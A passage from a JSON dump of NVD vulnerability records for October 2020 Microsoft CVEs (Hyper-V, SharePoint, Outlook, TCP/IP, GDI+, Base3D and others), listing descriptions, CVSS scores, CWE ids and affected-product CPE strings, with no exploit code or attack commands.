["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16967", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16967", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:45", "description": "A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka 'Windows Camera Codec Pack Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16967.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16968", "cwe": ["CWE-787", "CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16967", "CVE-2020-16968"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16968", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:13", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16952.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16951", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-21T16:07:00", "cpe": ["cpe:/a:microsoft:sharepoint_foundation:2013", "cpe:/a:microsoft:sharepoint_enterprise_server:2016", "cpe:/a:microsoft:sharepoint_server:2019"], "id": "CVE-2020-16951", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16951", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:20", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16952", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-21T16:07:00", "cpe": ["cpe:/a:microsoft:sharepoint_foundation:2013", "cpe:/a:microsoft:sharepoint_enterprise_server:2016", "cpe:/a:microsoft:sharepoint_server:2019"], "id": "CVE-2020-16952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:25:41", "description": "A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16915", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16915"], "modified": "2020-10-20T14:08:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-16915", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16915", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:25:05", "description": "A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Windows Hyper-V Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16891", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16891"], "modified": "2020-10-23T12:55:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-16891", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16891", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:-:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:-:*:*:-:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2022-03-23T14:27:05", "description": "A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka 'Microsoft Outlook Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16947", "cwe": ["CWE-787", "CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2020-10-22T16:49:00", "cpe": ["cpe:/a:microsoft:office:2019", "cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:outlook:2016"], "id": "CVE-2020-16947", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16947", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe:2.3:a:microsoft:outlook:2016:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:25:15", "description": "A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka 'Windows TCP/IP Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16898", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-23T12:50:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-16898", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16898", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:25:33", "description": "A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory, aka 'GDI+ Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16911", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16911"], "modified": "2020-10-20T14:06:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16911", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16911", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:25:47", "description": "A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory., aka 'Base3D Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-17003.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16918", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16918", "CVE-2020-17003"], "modified": "2020-10-21T19:39:00", "cpe": ["cpe:/a:microsoft:3d_viewer:-", "cpe:/a:microsoft:365_apps:-"], "id": "CVE-2020-16918", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16918", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:3d_viewer:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2022-03-23T14:29:06", "description": "A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory., aka 'Base3D Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16918.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-17003", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16918", "CVE-2020-17003"], "modified": "2020-10-21T19:45:00", "cpe": ["cpe:/a:microsoft:3d_viewer:-"], "id": "CVE-2020-17003", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17003", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:3d_viewer:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:20:33", "description": "A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka 'Microsoft Graphics Components Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16923.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-1167", "cwe": ["CWE-787", "CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1167", "CVE-2020-16923"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-1167", "href": 